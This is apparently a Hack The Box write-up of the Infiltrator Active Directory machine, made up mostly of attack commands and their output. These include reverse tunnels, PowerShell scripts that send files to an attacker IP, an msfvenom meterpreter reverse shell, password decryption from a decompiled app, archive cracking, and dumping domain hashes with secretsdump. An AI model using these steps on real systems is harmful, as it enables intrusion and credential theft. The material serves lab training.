[!] Template Permissions:               INFILTRATOR\infiltrator_svc$ : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
...
[?] +++++ Checking Template 'WebServer' +++++
[!] Template 'WebServer' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:                          WebServer
Template distinguishedname:             CN=WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation:                       12/08/2023 01:52:38
Extended Key Usage:                     Server Authentication
EnrollmentFlag:                         0
[!] CertificateNameFlag:                ENROLLEE_SUPPLIES_SUBJECT

[?] +++++ Checking Template 'Machine' +++++
[+] Identity 'INFILTRATOR\Domain Computers' has enrollment rights for template 'Machine'
Template Name:                          Machine
Template distinguishedname:             CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation:                       12/08/2023 01:52:38
[+] Extended Key Usage:                 Client Authentication, Server Authentication
EnrollmentFlag:                         AUTO_ENROLLMENT
CertificateNameFlag:                    SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[+] Enrollment allowed for:             INFILTRATOR\Domain Computers

[?] +++++ Checking Template 'User' +++++
[+] Identity 'INFILTRATOR\Domain Users' has enrollment rights for template 'User'
Template Name:                          User
Template distinguishedname:             CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation:                       12/08/2023 01:52:38
[+] Extended Key Usage:                 Encrypting File System, Secure E-mail, Client Authentication
EnrollmentFlag:                         INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag:                    SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for:             INFILTRATOR\Domain Users

[?] +++++ Checking Template 'SubCA' +++++
[!] Template 'SubCA' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:                          SubCA
Template distinguishedname:             CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation:                       12/08/2023 01:52:38
EnrollmentFlag:                         0
[!] CertificateNameFlag:                ENROLLEE_SUPPLIES_SUBJECT
...
[?] +++++ Searching for Group Managed Service Account (gMSA) +++++
[+] Found group Managed Service Account 'infiltrator_svc$':
sAMAccountName:                         infiltrator_svc$
distinguishedName:                      CN=infiltrator_svc,CN=Managed Service Accounts,DC=infiltrator,DC=htb
objectSid:                              S-1-5-21-2606098828-3734741516-3625406802-3102
[+] description:                        dc01.infiltrator.htb
[+] AllowedToRetrieveManagedPassword:   lan_managment
pwdLastSet:                             12/10/2023 07:28:23
[*] lastLogonTimestamp:                 02/19/2024 04:27:26 (Identity is likely not online anymore!)
userAccountControl:                     WORKSTATION_TRUST_ACCOUNT
...

Output Messenger (k.turner)

Before we begin the certificate shinanigans let's go back to k.turner password. I discarded the network output of winPeas, but it actually has interesting information.

+----------¦ Current TCP Listening Ports
+ Check for services restricted from the outside
  Enumerating IPv4 connections

  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name
...
  TCP        0.0.0.0               14126         0.0.0.0               0               Listening         3524            outputmessenger_httpd
  TCP        0.0.0.0               14406         0.0.0.0               0               Listening         5692            outputmessenger_mysqld
...

https://support.outputmessenger.com/server-install-faq/

PS C:\Program Files> Get-Acl 'Output Messenger' | fl

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Output Messenger
Owner  : BUILTIN\Administrators
Group  : INFILTRATOR\Domain Users
Access : NT SERVICE\TrustedInstaller Allow  FullControl
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         BUILTIN\Users Allow  -1610612736
         CREATOR OWNER Allow  268435456
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -1610612736
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  -1610612736
Audit  :
Sddl   : O:BAG:DUD:AI(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A
         ;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2)

PS C:\Program Files> Get-Acl 'Output Messenger Server' | fl
Get-Acl : Attempted to perform an unauthorized operation.

Install the official app for linux:

└─$ sudo dpkg -i OutputMessenger_amd64.deb
Selecting previously unselected package outputmessenger.
(Reading database ... 535734 files and directories currently installed.)
Preparing to unpack OutputMessenger_amd64.deb ...
Unpacking outputmessenger (2.0.40) ...
Setting up outputmessenger (2.0.40) ...
Processing triggers for kali-menu (2023.4.7) ...
Processing triggers for desktop-file-utils (0.27-1) ...
Processing triggers for mailcap (3.70+nmu1) ...

Time to proxify the connections!

PS C:\Users\M.harris\Music> iwr 10.10.14.43/chisel.exe -outfile chisel.exe
---
└─$ chisel server -p 36000 --reverse
---
# .\chisel.exe client 10.10.14.43:36000 R:14121-14129:localhost:14121-14129
PS C:\Users\M.harris\Music> Start-Job -ScriptBlock { & "C:\Users\M.harris\Music\chisel.exe" client 10.10.14.43:36000 R:14121:localhost:14121 R:14122:localhost:14122 R:14123:localhost:14123 R:14124:localhost:14124 R:14125:localhost:14125 R:14126:localhost:14126 R:14127:localhost:14127 R:14128:localhost:14128 R:14129:localhost:14129 R:14406:localhost:14406; }
---
└─$ outputmessenger

From the future: Handling ports was annoying so just automate it

netstat -an | Select-String "0.0.0.0:14[0-9]{3}.*LISTENING" | % { $port = $_.ToString().Split()[6].Split(':')[1]; $portString="R:${port}:localhost:${port}"; Start-Job -ScriptBlock { param($portString); & "C:\Users\winrm_svc\Music\chisel.exe" client 10.10.14.43:36000 $portString; } -ArgumentList $portString }

Creds: k.turner:MessengerApp@Pass!:127.0.0.1

Hidden Files

Previously winPeas found hidden directory in /Users:

PS C:\Users> ls '.\All Users\' -force -rec -fil '*.zip' -ErrorAction SilentlyContinue
    Directory: C:\Users\All Users\Output Messenger Server\Temp
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/19/2024   7:51 AM       15702539 OutputMessengerApache.zip
-a----        2/19/2024   7:51 AM       25477937 OutputMessengerMysql.zip
-a----        2/19/2024   7:52 AM        3369187 OutputWall.zip

function SendOverTcp {
    param ([string]$server, $port, $filePath)
    $tcpClient = New-Object Net.Sockets.TcpClient($server, $port)
    $stream = $tcpClient.GetStream()
    $bytes = [IO.File]::ReadAllBytes($filePath)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Close()
    $tcpClient.Close()
}

SendOverTcp "10.10.14.43" 4444 "C:\Users\All Users\Output Messenger Server\Temp\OutputMessengerApache.zip"
SendOverTcp "10.10.14.43" 4444 "C:\Users\All Users\Output Messenger Server\Temp\OutputMessengerMysql.zip"
SendOverTcp "10.10.14.43" 4444 "C:\Users\All Users\Output Messenger Server\Temp\OutputWall.zip"

MySQL

└─$ for file in $(ls *.zip); do unzip $file -d "${file%.zip}"; done;
└─$ pwd && cat OutputMysql.ini
/home//Desktop/Rooms/Infiltrator/all_users_zips/OutputMessengerMysql
[SETTINGS]
SQLPort=14406
Version=1.0.0

[DBCONFIG]
DBUsername=root
DBPassword=ibWijteig5
DBName=outputwall

[PATHCONFIG]
;mysql5.6.17
MySQL=mysql
Log=log
def_conf=settings
MySQL_data=data
Backup=backup

└─$ mysql -P 14406 -u 'root' -p'ibWijteig5'
Server version: 10.1.19-MariaDB mariadb.org binary distribution
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| outputwall         |
| performance_schema |
+--------------------+ 
MariaDB [(none)]> USE outputwall; 
MariaDB [outputwall]> SHOW TABLES;
+---------------------------+
| Tables_in_outputwall      |
+---------------------------+
| ot_attachment             |
| ot_comments               |
| ot_entity                 |
| ot_entity_accounts        |
| ot_entity_daysoff         |
| ot_entity_setting         |
| ot_sessions               |
| ot_user_notification_read |
| ot_user_notifications     |
| ot_wall_activity          |
| ot_wall_favorite          |
| ot_wall_notification      |
| ot_wall_posts             |
| ot_wall_tagmessages       |
| ot_wall_tags              |
| ot_wall_tokens            |
| ot_wall_usermessages      |
+---------------------------+
MariaDB [outputwall]> SELECT post_subject, post_message FROM ot_wall_posts \G
*************************** 1. row ***************************
post_subject: UserExplorer app  project
post_message: Hey team, I'm here! In this screenshot, I'll guide you through using the app UserExplorer.exe. It works seamlessly with dev credentials, but remember, it's versatile and functions with any credentials. Currently, we're exploring the default option. Stay tuned for more updates!

"UserExplorer.exe -u m.harris -p D3v3l0p3r_Pass@1337! -s M.harris"
*************************** 2. row ***************************
post_subject: Security Alert! Pre-Auth Disabled on kerberos for Some Users
post_message: Hey team,

We've identified a security concern: some users and our domain (dc01.infiltrator.htb) have pre-authentication disabled on kerberos.
No need to panic! Our vigilant team is already on it and will work diligently to fix this. In the meantime, stay vigilant and be cautious about any potential security risks.
2 rows in set (0.078 sec)

Unintended path

You can just read files, lmao

MariaDB [(none)]> SELECT LOAD_FILE('/Users/Administrator/Desktop/root.txt');
+----------------------------------------------------+
| LOAD_FILE('/Users/Administrator/Desktop/root.txt') |
+----------------------------------------------------+
| 483edf74dd53ffbe0eee7fe29c56943b                   |
+----------------------------------------------------+

Output Messenger (m.harris)

Creds: m.harris:D3v3l0p3r_Pass@1337!:127.0.0.1

I think Download button broke because I didn't have Storage Folder specified, ~~we can use~~ Download History ~~to get files.~~ still doesn't work because the app kinda died 💀 Box restart to the rescue.

Decompile the exe with ILSpy or similar, the app is written in C#

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.DirectoryServices;

public class Decryptor {
    public static string DecryptString(string key, string cipherText) {
        using Aes aes = Aes.Create();
        aes.Key = Encoding.UTF8.GetBytes(key);
        aes.IV = new byte[16];
        ICryptoTransform transform = aes.CreateDecryptor(aes.Key, aes.IV);
        using MemoryStream stream = new MemoryStream(Convert.FromBase64String(cipherText));
        using CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read);
        using StreamReader streamReader = new StreamReader(stream2);
        return streamReader.ReadToEnd();
    }
}

internal class LdapApp {
    private static void Main(string[] args) {
        string path = "LDAP://dc01.infiltrator.htb";
        string username = "";
        string password = "";
        string userToSearch = "";
        string username_winrm_scv = "winrm_svc";
        string cipherText = "TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=";
        for (int i = 0; i < args.Length; i += 2) {
            switch (args[i].ToLower()) {
                case "-u": username = args[i + 1]; break;
                case "-p": password = args[i + 1]; break;
                case "-s": userToSearch = args[i + 1]; break;
                case "-default":
                    username = username_winrm_scv;
                    password = Decryptor.DecryptString("b14ca5898a4e4133bbce2ea2315a1916", cipherText); break;
                default: Console.WriteLine($"Invalid argument: {args[i]}"); return;
            }
        }
        if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(userToSearch)) {
            Console.WriteLine("Usage: UserExplorer.exe -u <username> -p <password>  -s <searchedUsername> [-default]");
            Console.WriteLine("To use the default credentials: UserExplorer.exe -default -s userToSearch");
            return;
        }
        try {
            Console.WriteLine("Attempting Service Connection...");
            DirectoryEntry directoryEntry = new DirectoryEntry(path, username, password);
            try {
                Console.WriteLine("Service Connection Successful.");
                DirectorySearcher directorySearcher = new DirectorySearcher(directoryEntry);
                try {
                    directorySearcher.Filter = $ "(SAMAccountName={text3})";
                    Console.WriteLine($"Search for {userToSearch} user...");
                    SearchResult searchResult = directorySearcher.FindOne();
                    if (searchResult != null) {
                        Console.WriteLine("User found. Details:");
                        DirectoryEntry directoryEntry2 = searchResult.GetDirectoryEntry();
                        Console.WriteLine(string.Format("Name: {0}", directoryEntry2.Properties["cn"].Value));
                        Console.WriteLine(string.Format("EmailID: {0}", directoryEntry2.Properties["mail"].Value));
                        Console.WriteLine(string.Format("Telephone Extension: {0}", directoryEntry2.Properties["telephoneNumber"].Value));
                        Console.WriteLine(string.Format("Department: {0}", directoryEntry2.Properties["department"].Value));
                        Console.WriteLine(string.Format("Job Title: {0}", directoryEntry2.Properties["title"].Value));
                    } else { Console.WriteLine("User not found."); }
                } finally { ((IDisposable)directorySearcher)?.Dispose(); }
            } finally { ((IDisposable)directoryEntry)?.Dispose(); }
        } catch (Exception ex) { Console.WriteLine($"An error occurred: {ex.Message}"); }
    }
}

// https://www.programiz.com/online-compiler/878jSU8bZORep
using System;
using System.IO;
using System.Text;
using System.Security.Cryptography;

public class Decryptor {
  public static string DecryptString(string key, string cipherText) {
    using Aes aes = Aes.Create();
    aes.Key = Encoding.UTF8.GetBytes(key);
    aes.IV = new byte[16];
    ICryptoTransform transform = aes.CreateDecryptor(aes.Key, aes.IV);
    using MemoryStream stream = new MemoryStream(Convert.FromBase64String(cipherText));
    using CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read);
    using StreamReader streamReader = new StreamReader(stream2);
    return streamReader.ReadToEnd();
  }

  private static void Main(string[] args) {
    string cipherText = "TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=";
    string key = "b14ca5898a4e4133bbce2ea2315a1916";
    string password = Decryptor.DecryptString(key, cipherText);
           password = Decryptor.DecryptString(key, password);
    Console.WriteLine($"Password: {password}");
  }
}

// Password: WinRm@$svc^!^P

evil-winrm (winrm_svc)

Creds: winrm_svc:WinRm@$svc^!^P

└─$ evil-winrm -i dc01.infiltrator.htb -u winrm_svc -p 'WinRm@$svc^!^P'

Nothing much in users directory, but we can login via chat app again

The only other user that has access to the chat is probably A.walker

Chat Logs

Winpeas showed something interesting again in home directory.

+ Searching hidden files or folders in C:\Users home (can be slow)
+    C:\Users\Default
     C:\Users\Default User
     C:\Users\All Users
     C:\Users\winrm_svc\AppData\Roaming\Output Messenger\SpellCheck
     C:\Users\All Users\ntuser.pol

*Evil-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA> download OM.db3
Info: Downloading C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA\OM.db3 to OM.db3

*Evil-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA> download OT.db3
Info: Downloading C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA\OT.db3 to OT.db3
---
└─$ file *
OM.db3: SQLite 3.x database, last written using SQLite version 3008006, page size 1024, file counter 33, database pages 29, cookie 0xf, schema 4, UTF-8, version-valid-for 33
OT.db3: SQLite 3.x database, last written using SQLite version 3008006, page size 1024, file counter 8, database pages 13, cookie 0x6, schema 4, UTF-8, version-valid-for 8

The winrm_svc user has an interesting node too:

lan_managment  api key 558R501T5I6024Y8JV3B7KOUN1A518GG

https://support.outputmessenger.com/chat-room-api/#Retrieving_a_chat_room

└─$ curl 'http://localhost:14125/api/chatrooms/logs?roomkey=20240220014618@conference.com&fromdate=2018/07/24&todate=2025/07/24' -H 'API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG' -s | jq .logs > logs.html

Hidden chat logs

Creds: O.martinez:m@rtinez@1996!

The app was acting wacky, and luckily there was a web interface we could use. When going through the chats we see some messages we haven't seen before.

Bruteforce Try

idk My password is a combination of my name and birth year, like username + birthday which is 1999!!

First try at bruteforce:

└─$ for name in $(grep 'mart' ./kerberos/lists/usernames.txt); do echo "${name}1999" >> passwords; done;
└─$ for name in $(grep 'mart' ./kerberos/lists/usernames.txt); do echo "${name}1999\!\!" >> passwords; done;
└─$ netexec smb 10.129.98.160 -u 'O.martinez' -p passwords
... NOTHING ...

She did complain about some site popping up and her calendar is full of their domain, dns poisoning to steal the user hash?

Windows Client

Run Application

For whatever the fucking reason, you need to download Windows client and then you have access to new task.

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> upload www/rev.exe                        
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> mkdir /temp
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> mv rev.exe /temp
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> icacls C:\temp /grant 'Everyone:(F)' /T /C
processed file: C:\temp
processed file: C:\temp\rev.exe
Successfully processed 2 files; Failed processing 0 files

First sync the calendar, then setup new Run Application and run the revshell that exists on remote system (MIGHT ALSO NEED TO EXIST ON YOUR WINDOWS)

Reverse Shell

PS C:\users\O.martinez> whoami /all

User Name              SID
====================== ==============================================
infiltrator\o.martinez S-1-5-21-2606098828-3734741516-3625406802-1106

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users               Alias            S-1-5-32-555                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Group used for deny only
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON      Well-known group S-1-5-14                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                        Mandatory group, Enabled by default, Enabled group
INFILTRATOR\Chiefs Marketing               Group            S-1-5-21-2606098828-3734741516-3625406802-1111 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                       Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword

This didn't work 🤔

PS C:\users\O.martinez\music> IEX(IWR 10.10.14.43/PowerView.ps1 -UseBasicParsing)
PS C:\users\O.martinez\music> $NewPassword = ConvertTo-SecureString 'Password123$' -AsPlainText -Force   
PS C:\users\O.martinez\music> Set-DomainUserPassword -Identity 'M.harris' -AccountPassword $NewPassword
---
└─$ netexec smb infiltrator.htb -u 'M.harris' -p 'Password123$'
SMB         10.129.13.179   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.13.179   445    DC01             [-] infiltrator.htb\M.harris:Password123$ STATUS_ACCOUNT_RESTRICTION

Since the box is revolved around app check for something interesting.

PS C:\users\O.martinez\appdata\roaming\Output Messenger\FAAA> ls 'Received Files' -rec -file

    Directory: C:\users\O.martinez\appdata\roaming\Output Messenger\FAAA\Received Files\203301
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/23/2024   4:10 PM         292244 network_capture_2024.pcapng

Network Capture

Download the file

$server = "10.10.14.43"
$port = 4444
$filePath = "C:\users\O.martinez\appdata\roaming\Output Messenger\FAAA\Received Files\203301\network_capture_2024.pcapng"

$tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port)
$networkStream = $tcpClient.GetStream()
$fileBytes = [System.IO.File]::ReadAllBytes($filePath)
$networkStream.Write($fileBytes, 0, $fileBytes.Length)
$networkStream.Flush()
$networkStream.Close()
$tcpClient.Close()
---
└─$ listen > network_capture_2024.pcapng

└─$ file *
%2f:                    HTML document, ASCII text
%2f(1):                 HTML document, ASCII text
%2f(2):                 HTML document, ASCII text
BitLocker-backup(1).7z: 7-zip archive data, version 0.4
BitLocker-backup.7z:    HTML document, ASCII text
change_auth_token:      JSON text data
files:                  HTML document, ASCII text, with very long lines (374)
files(1):               HTML document, ASCII text, with very long lines (374)
files(2):               HTML document, ASCII text
files(3):               HTML document, ASCII text
login:                  ASCII text, with no line terminators
login(1):               HTML document, ASCII text
login(2):               HTML document, ASCII text
login(3):               HTML document, ASCII text

BitLocker

Zip is password protected so crack the password:

└─$ 7z2john BitLocker-backup\(1\).7z > bitlocker.hash
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "7z", but the string is also recognized as "7z-opencl"
Use the "--format=7z-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 8 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
zipper           (BitLocker-backup(1).7z)
1g 0:00:01:55 DONE (2024-09-03 18:03) 0.008683g/s 48.34p/s 48.34c/s 48.34C/s blacks..spartans
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Recovery key:

650540-413611-429792-307362-466070-397617-148445-087043

Hmmm.... There's also some kind of authorization password

Connection errors

I decided to upgrade to persistent shell because the connection was not acting nicely.

└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4445 -f exe -o rev.exe
---
└─$ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 4445
msf6 exploit(multi/handler) > run

And at this moment my box died 🎉

Previous I had luck dependent method work, so this time I restarted the box, switch network adapter from NAT to Bridged and setup ligolo-ng

Lol, I had problems setting it up so I just went back to Chisel, which works very nicely!

Setup chisel on remote, and when you connect to Chat server specify the IP of your attacker box (~kali). Access chain like: Host -> Kali -> Victim

Drives Enumeration

Get drives available on system:

PS C:\Users\O.martinez> Get-PSDrive
Name           Used (GB)     Free (GB) Provider      Root                                               CurrentLocation
----           ---------     --------- --------      ----                                               ---------------
Alias                                  Alias
C                  15.07         43.32 FileSystem    C:\                                               Users\O.martinez
Cert                                   Certificate   \                                                      CurrentUser
Env                                    Environment
Function                               Function
HKCU                                   Registry      HKEY_CURRENT_USER
HKLM                                   Registry      HKEY_LOCAL_MACHINE
Variable                               Variable
WSMan                                  WSMan
PS C:\Users\O.martinez> Get-Volume
DriveLetter FriendlyName FileSystemType DriveType HealthStatus OperationalStatus SizeRemaining    Size
----------- ------------ -------------- --------- ------------ ----------------- -------------    ----
E                        Unknown        Fixed     Healthy      Unknown                     0 B     0 B
C                        NTFS           Fixed     Healthy      OK                     43.32 GB 58.4 GB

PS C:\Users\O.martinez\Music> .\wp.exe | tee-object -filepath wp.log
...
 Drives Information
 Remember that you should search more info inside the other drives
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 43 GB)(Permissions: Users [AppendData/CreateDirectories])
    E:\ (Type: Fixed)
...
 Services Information

 Interesting Services -non Microsoft-
 Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
    OutputMessengerApache(Output Messenger - Apache)["C:\Program Files\Output Messenger Server\Plugins\Output\apache2\bin\outputmessenger_httpd.exe" -k runservice] - Auto - Running
    Apache/2.4.9 (Win32) PHP/5.5.12
   =================================================================================================

    OutputMessengerMySQL(Output Messenger - MySQL)["C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\outputmessenger_mysqld.exe" "--defaults-file=C:\Program Files\Output Messenger Server\Plugins\Output\mysql\my.ini" "OutputMessengerMySQL"] - Auto - Running
    Output Messenger - MySQL
   =================================================================================================
...
 Checking write permissions in PATH folders (DLL Hijacking)
 Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
    C:\Windows\system32
    C:\Windows
    C:\Windows\System32\Wbem
    C:\Windows\System32\WindowsPowerShell\v1.0\
    C:\Windows\System32\OpenSSH\
    C:\Program Files\Output Messenger Server\Plugins\Output\apache2\bin\
    C:\Program Files\Output Messenger Server\Plugins\Output\php\
    C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\
...

Martinez Password

Creds: O.martinez:M@rtinez_P@ssw0rd!

RDP

We can now finally RDP as Martinez.

The drive can be found via explorer at E: and you need to use the Recovery Code, then we can find interesting files in Administrator's home.

Note: I exfiltrated file via simple PHP server https://gist.github.com/taterbase/2688850 (php -S 0.0.0.0:80 and mkdir uploads)

Exfiltrate the file and check contents

└─$ 7z x Backup_Credentials.7z
└─$ lta
drwxr-xr-x    - woyag  3 Sep 16:22  .
drwxr-xr-x    - woyag 25 Feb 10:12 ├──  'Active Directory'
.rw-r--r--  36M woyag 25 Feb 10:12 │  └──  ntds.dit
.rw-r--r-- 2.1M woyag  3 Sep 16:22 ├──  Backup_Credentials.7z
drwxr-xr-x    - woyag 25 Feb 10:12 └──  registry
.rw-r--r-- 262k woyag 25 Feb 10:00    ├──  SECURITY
.rw-r--r--  13M woyag 25 Feb 10:00    └──  SYSTEM

Dump the passwords via secretsdump:

└─$ impacket-secretsdump -security ./registry/SECURITY -system ./registry/SYSTEM -ntds ./Active\ Directory/ntds.dit LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0xd7e7d8797c1ccd58d95e4fb25cb7bdd4
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:4b90048ad6028aae98f66484009266d4efa571d48a8aa6b771d69d20aba16ddb7e0a0ffe9378a1ac7b31a812f0760fe2a8ce66ff6a0ff772155a29baa59b4407a95a920d0904cba6f8b19b6393f1551a476f991bbedaa66880e60611482a81b31b34c55c77d0e0d1792e3b18cdc9d39e0b776e7ef082399b096aaa2e8d93eb1f0340fd5f6e138da2580d1f581ff9426dce99a901a1bf88ad3f19a5bc4ce8ff17fdbb0a04bb29f13dc46177a6d8cd61bf91f8342e33b5362daecbb888df22ce467aa9f45a9dc69b03d116eeac89857d17f3f44f4abc34165b296a42b3b3ff5ab26401b5734fab6ad142d7882715927e45
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x81f5247051ff9535ad8299f0efd531ff3a5cb688
dpapi_userkey:0x79d13d91a01f6c38437c526396febaf8c1bc6909
[*] NL$KM
 0000   2E 8A EC D8 ED 12 C6 ED  26 8E B0 9B DF DA 42 B7   ........&.....B.
 0010   49 DA B0 07 05 EE EA 07  05 02 04 0E AD F7 13 C2   I...............
 0020   6C 6D 8E 19 1A B0 51 41  7C 7D 73 9E 99 BA CD B1   lm....QA|}s.....
 0030   B7 7A 3E 0F 59 50 1C AD  8F 14 62 84 3F AC A9 92   .z>.YP....b.?...
NL$KM:2e8aecd8ed12c6ed268eb09bdfda42b749dab00705eeea070502040eadf713c26c6d8e191ab051417c7d739e99bacdb1b77a3e0f59501cad8f1462843faca992
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d27644ab3070f72ec264fcb413d75299
[*] Reading and decrypting hashes from ./Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:454fcbc37690c6e4628ab649e8e285a5:::
infiltrator.htb\winrm_svc:1104:aad3b435b51404eeaad3b435b51404ee:84287cd16341b91eb93a58456b73e30f:::
infiltrator.htb\lan_managment:1105:aad3b435b51404eeaad3b435b51404ee:e8ade553d9b0cb1769f429d897c92931:::
infiltrator.htb\M.harris:1106:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a3d3ca7:::
infiltrator.htb\D.anderson:1107:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\L.clark:1108:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\O.martinez:1109:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5061e2dff4:::
infiltrator.htb\A.walker:1110:aad3b435b51404eeaad3b435b51404ee:46389d8dfdfcf0cbe262a71f576e574b:::
